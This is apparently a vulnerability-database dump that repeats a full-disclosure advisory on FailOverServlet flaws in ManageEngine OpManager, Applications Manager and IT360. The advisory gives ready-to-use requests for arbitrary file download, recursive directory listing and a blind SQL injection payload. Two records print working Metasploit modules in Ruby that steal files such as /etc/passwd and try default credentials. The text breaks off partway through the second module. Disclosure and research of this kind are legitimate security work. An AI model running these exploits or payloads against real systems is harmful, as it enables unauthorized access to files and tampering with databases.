{"id": "SECURITYVULNS:DOC:31699", "bulletinFamily": "software", "title": "[The ManageOwnage Series, part XII]: Multiple vulnerabilities in FailOverServlet (OpManager, AppManager, IT360)", "description": "\r\n\r\nHi,\r\n\r\nThis is part 12 of the ManageOwnage series. For previous parts, see [1].\r\n\r\nThis time we have an arbitrary file download, directory content\r\ndisclosure and blind SQL injection vulnerabilities in ManageEngine\r\nOpManager, Applications Manager and IT360.\r\n\r\nI've pushed two new Metasploit modules into the framework that exploit\r\nthe file download and the content disclosure [2], these should\r\nhopefully be accepted soon.\r\nThe full advisory text is below, and as always you can get a copy from\r\nmy repo [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 28/01/2014 / Last updated: 28/01/2014\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"ManageEngine Applications Manager is a comprehensive application\r\nmonitoring software used to monitor heterogeneous business\r\napplications such as web applications, application servers, web\r\nservers, databases, network services, systems, virtual systems, cloud\r\nresources, etc. It provides remote business management to the\r\napplications or resources in the network. It is a powerful tool for\r\nsystem and network administrators, helping them monitor any number of\r\napplications or services running in the network without much manual\r\neffort."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\nThe affected servlet is the "FailOverHelperServlet" (affectionately\r\ncalled FailServlet).\r\nThere are definitely more vulnerabilities than the ones identified\r\nbelow - for example it is possible to hijack the failover operation\r\ncompletely. The ones listed below as the easy ones to find and\r\nexploit.\r\n\r\n\r\n#1\r\nVulnerability: Arbitrary file download\r\nCVE-2014-7863\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.Y\r\nbXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5\r\n\r\nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini\r\n\r\n\r\n#2\r\nVulnerability: Information disclosure - list all files in a directory\r\nand its children\r\nCVE-2014-7863 (same as #1)\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.Y\r\nbXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5\r\n\r\nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\r\n\r\n\r\n#3\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7864\r\nAffected versions: ManageEngine OpManager v8 - v11.Y bXXXXX; IT360 v? to v10.5\r\nConstraints: unauthenticated in OpManager; authenticated in IT360\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a\r\n\r\n\r\n>> Fix:\r\nFor Applications Manager, upgrade to version 11.9 b11912.\r\n\r\nFor OpManager, install the patch for v11.4 and 11.5:\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet\r\nVersion 11.6 will be released with the patch.\r\n\r\nThese vulnerabilities remain UNFIXED in IT360.\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\nhttp://seclists.org/fulldisclosure/2014/Nov/21\r\nhttp://seclists.org/fulldisclosure/2014/Dec/9\r\nhttp://seclists.org/fulldisclosure/2015/Jan/2\r\nhttp://seclists.org/fulldisclosure/2015/Jan/5\r\n\r\n[2]\r\nhttps://github.com/rapid7/metasploit-framework/pull/4658\r\nhttps://github.com/rapid7/metasploit-framework/pull/4659\r\n\r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt\r\n\r\n", "published": "2015-02-02T00:00:00", "modified": "2015-02-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31699", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-7863", "CVE-2014-7864"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:57", "edition": 1, "viewCount": 44, "enchantments": {"score": {"value": 7.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2015-0206"]}, {"type": "cve", "idList": ["CVE-2014-7863", "CVE-2014-7864"]}, {"type": "exploitdb", "idList": ["EDB-ID:43894"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:806DED79DBD9E4D12D62BB145B4358CC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_DIR_LISTING", "MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_FILE_DOWNLOAD"]}, {"type": "nessus", "idList": ["MANAGEENGINE_APPLICATIONS_MANAGER_11912_INFO_DISCLOSURE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805473"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130162"]}, {"type": "zdi", "idList": ["ZDI-15-162"]}, {"type": "zdt", "idList": ["1337DAY-ID-23225", "1337DAY-ID-23226", "1337DAY-ID-29643"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-7864"]}, {"type": "exploitdb", "idList": ["EDB-ID:43894"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_DIR_LISTING", "MSF:AUXILIARY/ADMIN/HTTP/MANAGEENGINE_FILE_DOWNLOAD"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805473"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130162"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14253"]}, {"type": "zdt", "idList": ["1337DAY-ID-23225"]}]}, "exploitation": null, "vulnersScore": 7.7}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities", "edition": 2, "cvss3": {}, "published": "2015-02-09T00:00:00", "title": "ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7863", "CVE-2014-7864"], "modified": "2015-02-09T00:00:00", "id": "EXPLOITPACK:806DED79DBD9E4D12D62BB145B4358CC", "href": "", "sourceData": ">> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n==========================================================================\nDisclosure: 28/01/2015 / Last updated: 09/02/2015\n\n>> Background on the affected products:\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\n\n\"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort.\"\n\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\n\n\n>> Technical details:\nThe affected servlet is the \"FailOverHelperServlet\" (affectionately called FailServlet).\nThere are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit.\n\n\n#1\nVulnerability: Arbitrary file download\nCVE-2014-7863\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\n\nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\\\boot.ini\n\n\n#2\nVulnerability: Information disclosure - list all files in a directory and its children\nCVE-2014-7863 (same as #1)\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\n\nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\\\n\n\n#3\nVulnerability: Blind SQL injection\nCVE-2014-7864\nAffected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\nConstraints: unauthenticated in OpManager; authenticated in IT360\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a\n\n\n>> Fix: \nFor Applications Manager, upgrade to version 11.9 b11912.\n\nFor OpManager, install the patch for v11.4 and 11.5:\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet\nVersion 11.6 will be released with the patch.\n\nThese vulnerabilities remain UNFIXED in IT360.\n\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-15T19:15:44", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "ManageEngine OpManager / Applications Manager / IT360 -FailOverServlet Multiple Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7863", "CVE-2014-7864"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29643", "href": "https://0day.today/exploit/description/29643", "sourceData": ">> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 28/01/2015 / Last updated: 09/02/2015\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\nThe affected servlet is the \"FailOverHelperServlet\" (affectionately called FailServlet).\r\nThere are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit.\r\n \r\n \r\n#1\r\nVulnerability: Arbitrary file download\r\nCVE-2014-7863\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\n \r\nPOST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\\\boot.ini\r\n \r\n \r\n#2\r\nVulnerability: Information disclosure - list all files in a directory and its children\r\nCVE-2014-7863 (same as #1)\r\nConstraints: unauthenticated in OpManager and AppManager; authenticated in IT360\r\nAffected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\n \r\nPOST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\\\\r\n \r\n \r\n#3\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7864\r\nAffected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5\r\nConstraints: unauthenticated in OpManager; authenticated in IT360\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a\r\n \r\n \r\n>> Fix: \r\nFor Applications Manager, upgrade to version 11.9 b11912.\r\n \r\nFor OpManager, install the patch for v11.4 and 11.5:\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet\r\nVersion 11.6 will be released with the patch.\r\n \r\nThese vulnerabilities remain UNFIXED in IT360.\r\n \r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-02-15] #", "sourceHref": "https://0day.today/exploit/29643", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-02T23:41:29", "description": "This module exploits a directory listing information disclosure vulnerability in the FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It makes a recursive listing, so it will list the whole drive if you ask it to list / in Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This module will attempt to login using the default credentials for the administrator and guest accounts; alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the OpManager instance (usually 8300). This module has been tested on both Windows and Linux with several different versions Windows paths have to be escaped with 4 backslashes on the command line. There is a companion module that allows you to download an arbitrary file. This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.#### Usage Info\nmsf > use auxiliary/admin/http/manageengine_dir_listing \rmsf auxiliary(manageengine_dir_listing) > show actions \r...actions... \rmsf auxiliary(manageengine_dir_listing) > set ACTION <action-name> \rmsf auxiliary(manageengine_dir_listing) > show options \r...show and set options... \rmsf auxiliary(manageengine_dir_listing) > run", "cvss3": {}, "published": "2015-02-03T00:00:00", "type": "zdt", "title": "ManageEngine Multiple Products Arbitrary Directory Listing Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7863"], "modified": "2015-02-03T00:00:00", "id": "1337DAY-ID-23226", "href": "https://0day.today/exploit/description/23226", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Auxiliary::Report\r\ninclude Msf::Exploit::Remote::HttpClient\r\ndef initialize(info={})\r\nsuper(update_info(info,\r\n'Name' => \"ManageEngine Multiple Products Arbitrary Directory Listing\",\r\n'Description' => %q{\r\nThis module exploits a directory listing information disclosure vulnerability in the\r\nFailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\r\nmakes a recursive listing, so it will list the whole drive if you ask it to list / in\r\nLinux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\r\nApplications Manager, but authenticated in IT360. This module will attempt to login\r\nusing the default credentials for the administrator and guest accounts; alternatively\r\nyou can provide a pre-authenticated cookie or a username / password combo. For IT360\r\ntargets enter the RPORT of the OpManager instance (usually 8300). This module has been\r\ntested on both Windows and Linux with several different versions Windows paths have to\r\nbe escaped with 4 backslashes on the command line. There is a companion module that\r\nallows you to download an arbitrary file. This vulnerability has been fixed in Applications\r\nManager v11.9 b11912 and OpManager 11.6.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n['CVE', '2014-7863'],\r\n['OSVDB', '117696'],\r\n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],\r\n['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']\r\n],\r\n'DisclosureDate' => 'Jan 28 2015'))\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptString.new('TARGETURI', [true, \"The base path to OpManager, AppManager or IT360\", '/']),\r\nOptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),\r\nOptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),\r\nOptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),\r\nOptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),\r\nOptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])\r\n], self.class)\r\nend\r\ndef get_cookie\r\ncookie = nil\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'uri' => normalize_uri(datastore['TARGETURI'])\r\n})\r\nif res\r\ncookie = res.get_cookies\r\nend\r\ncookie\r\nend\r\ndef detect_it360\r\nres = send_request_cgi({\r\n'uri' => '/',\r\n'method' => 'GET'\r\n})\r\nif res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/\r\nreturn true\r\nend\r\nreturn false\r\nend\r\ndef get_it360_cookie_name\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'uri' => normalize_uri('/')\r\n})\r\ncookie = res.get_cookies\r\nif cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/\r\nreturn $1\r\nelse\r\nreturn nil\r\nend\r\nend\r\ndef authenticate_it360(port, path, username, password)\r\nif datastore['DOMAIN_NAME'].nil?\r\nvars_post = {\r\n'LOGIN_ID' => username,\r\n'PASSWORD' => password,\r\n'isADEnabled' => 'false'\r\n}\r\nelse\r\nvars_post = {\r\n'LOGIN_ID' => username,\r\n'PASSWORD' => password,\r\n'isADEnabled' => 'true',\r\n'domainName' => datastore['DOMAIN_NAME']\r\n}\r\nend\r\nres = send_request_cgi({\r\n'rport' => port,\r\n'method' => 'POST',\r\n'uri' => normalize_uri(path),\r\n'vars_get' => {\r\n'service' => \"OpManager\",\r\n'furl' => \"/\",\r\n'timestamp' => Time.now.to_i\r\n},\r\n'vars_post' => vars_post\r\n})\r\nif res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/\r\n# /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/ -> this pattern is to avoid matching \"removed\"\r\nreturn res.get_cookies\r\nend\r\nnil\r\nend\r\ndef login_it360\r\n# Do we already have a valid cookie? If yes, just return that.\r\nunless datastore['IAMAGENTTICKET'].nil?\r\ncookie_name = get_it360_cookie_name\r\ncookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'\r\nreturn cookie\r\nend\r\n# get the correct path, host and port\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'uri' => normalize_uri('/')\r\n})\r\nif res && res.redirect?\r\nuri = [ res.redirection.port, res.redirection.path ]\r\nelse\r\nreturn nil\r\nend\r\nif datastore['USERNAME'] && datastore['PASSWORD']\r\nprint_status(\"#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...\")\r\ncookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])\r\nunless cookie.nil?\r\nreturn cookie\r\nend\r\nend\r\ndefault_users = ['guest', 'administrator', 'admin']\r\ndefault_users.each do |user|\r\nprint_status(\"#{peer} - Trying to authenticate as #{user}...\")\r\ncookie = authenticate_it360(uri[0], uri[1], user, user)\r\nunless cookie.nil?\r\nreturn cookie\r\nend\r\nend\r\nnil\r\nend\r\ndef run\r\n# No point to continue if directory is not specified\r\nif datastore['DIRECTORY'].empty?\r\nprint_error('Please supply the path of the directory you want to list.')\r\nreturn\r\nend\r\nif detect_it360\r\nprint_status(\"#{peer} - Detected IT360, attempting to login...\")\r\ncookie = login_it360\r\nelse\r\ncookie = get_cookie\r\nend\r\nif cookie.nil?\r\nprint_error(\"#{peer} - Failed to get application cookies!\")\r\nreturn\r\nend\r\nservlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'cookie' => cookie,\r\n'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\r\n})\r\nif res && res.code == 404\r\nservlet = 'FailOverHelperServlet'\r\nend\r\n# Create request\r\nbegin\r\nprint_status(\"#{peer} - Listing directory #{datastore['DIRECTORY']}\")\r\nres = send_request_cgi({\r\n'method' => 'POST',\r\n'cookie' => cookie,\r\n'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),\r\n'vars_get' => {\r\n'operation' => 'listdirectory',\r\n'rootDirectory' => datastore['DIRECTORY']\r\n}\r\n})\r\nrescue Rex::ConnectionRefused\r\nprint_error(\"#{peer} - Could not connect.\")\r\nreturn\r\nend\r\n# Show data if needed\r\nif res && res.code == 200 && res.body\r\nvprint_line(res.body.to_s)\r\nfname = File.basename(datastore['DIRECTORY'])\r\npath = store_loot(\r\n'manageengine.http',\r\n'text/plain',\r\ndatastore['RHOST'],\r\nres.body.to_s,\r\nfname\r\n)\r\nprint_good(\"File with directory listing saved in: #{path}\")\r\nelse\r\nprint_error(\"#{peer} - Failed to list directory.\")\r\nend\r\nend\r\n\n\n# 0day.today [2018-03-02] #", "sourceHref": "https://0day.today/exploit/23226", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:LOW/Au:UNKNOWN/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T17:19:06", "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This module will attempt to login using the default credentials for the administrator and guest accounts; alternatively you can provide a pre-authenticated cookie or a username and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually 8300). This module has been tested on both Windows and Linux with several different versions. Windows paths have to be escaped with 4 backslashes on the command line. There is a companion module that allows you to list the contents of any directory recursively. This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.#### Usage Info\nmsf > use auxiliary/admin/http/manageengine_file_download \rmsf auxiliary(manageengine_file_download) > show actions \r...actions... \rmsf auxiliary(manageengine_file_download) > set ACTION <action-name> \rmsf auxiliary(manageengine_file_download) > show options \r...show and set options... \rmsf auxiliary(manageengine_file_download) > run", "cvss3": {}, "published": "2015-02-03T00:00:00", "type": "zdt", "title": "ManageEngine Multiple Products Arbitrary File Download Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7863"], "modified": "2015-02-03T00:00:00", "id": "1337DAY-ID-23225", "href": "https://0day.today/exploit/description/23225", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nrequire 'msf/core'\r\nclass Metasploit3 < Msf::Auxiliary\r\ninclude Msf::Auxiliary::Report\r\ninclude Msf::Exploit::Remote::HttpClient\r\ndef initialize(info={})\r\nsuper(update_info(info,\r\n'Name' => \"ManageEngine Multiple Products Arbitrary File Download\",\r\n'Description' => %q{\r\nThis module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\r\non ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\r\nunauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\r\nmodule will attempt to login using the default credentials for the administrator and\r\nguest accounts; alternatively you can provide a pre-authenticated cookie or a username\r\nand password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\r\n8300). This module has been tested on both Windows and Linux with several different\r\nversions. Windows paths have to be escaped with 4 backslashes on the command line. There is\r\na companion module that allows you to list the contents of any directory recursively. This\r\nvulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.\r\n},\r\n'Author' =>\r\n[\r\n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module\r\n],\r\n'License' => MSF_LICENSE,\r\n'References' =>\r\n[\r\n['CVE', '2014-7863'],\r\n['OSVDB', '117695'],\r\n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],\r\n['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']\r\n],\r\n'DisclosureDate' => 'Jan 28 2015'))\r\nregister_options(\r\n[\r\nOpt::RPORT(80),\r\nOptString.new('TARGETURI', [true, \"The base path to OpManager, AppManager or IT360\", '/']),\r\nOptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),\r\nOptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),\r\nOptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),\r\nOptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),\r\nOptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])\r\n], self.class)\r\nend\r\ndef get_cookie\r\ncookie = nil\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'uri' => normalize_uri(datastore['TARGETURI'])\r\n})\r\nif res\r\ncookie = res.get_cookies\r\nend\r\ncookie\r\nend\r\ndef detect_it360\r\nres = send_request_cgi({\r\n'uri' => '/',\r\n'method' => 'GET'\r\n})\r\nif res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/\r\nreturn true\r\nend\r\nreturn false\r\nend\r\ndef get_it360_cookie_name\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'uri' => normalize_uri('/')\r\n})\r\ncookie = res.get_cookies\r\nif cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/\r\nreturn $1\r\nelse\r\nreturn nil\r\nend\r\nend\r\ndef authenticate_it360(port, path, username, password)\r\nif datastore['DOMAIN_NAME'].nil?\r\nvars_post = {\r\n'LOGIN_ID' => username,\r\n'PASSWORD' => password,\r\n'isADEnabled' => 'false'\r\n}\r\nelse\r\nvars_post = {\r\n'LOGIN_ID' => username,\r\n'PASSWORD' => password,\r\n'isADEnabled' => 'true',\r\n'domainName' => datastore['DOMAIN_NAME']\r\n}\r\nend\r\nres = send_request_cgi({\r\n'rport' => port,\r\n'method' => 'POST',\r\n'uri' => normalize_uri(path),\r\n'vars_get' => {\r\n'service' => 'OpManager',\r\n'furl' => '/',\r\n'timestamp' => Time.now.to_i\r\n},\r\n'vars_post' => vars_post\r\n})\r\nif res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/\r\n# /IAMAGENTTICKET([A-Z]{0,4})=([\\w]{9,})/ -> this pattern is to avoid matching \"removed\"\r\nreturn res.get_cookies\r\nend\r\nnil\r\nend\r\ndef login_it360\r\n# Do we already have a valid cookie? If yes, just return that.\r\nunless datastore['IAMAGENTTICKET'].nil?\r\ncookie_name = get_it360_cookie_name\r\ncookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'\r\nreturn cookie\r\nend\r\n# get the correct path, host and port\r\nres = send_request_cgi({\r\n'method' => 'GET',\r\n'uri' => normalize_uri('/')\r\n})\r\nif res && res.redirect?\r\nuri = [ res.redirection.port, res.redirection.path ]\r\nelse\r\nreturn nil\r\nend\r\nif datastore['USERNAME'] && datastore['PASSWORD']\r\nprint_status(\"#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...\")\r\ncookie = authenticate_it360(uri[0], uri[1], 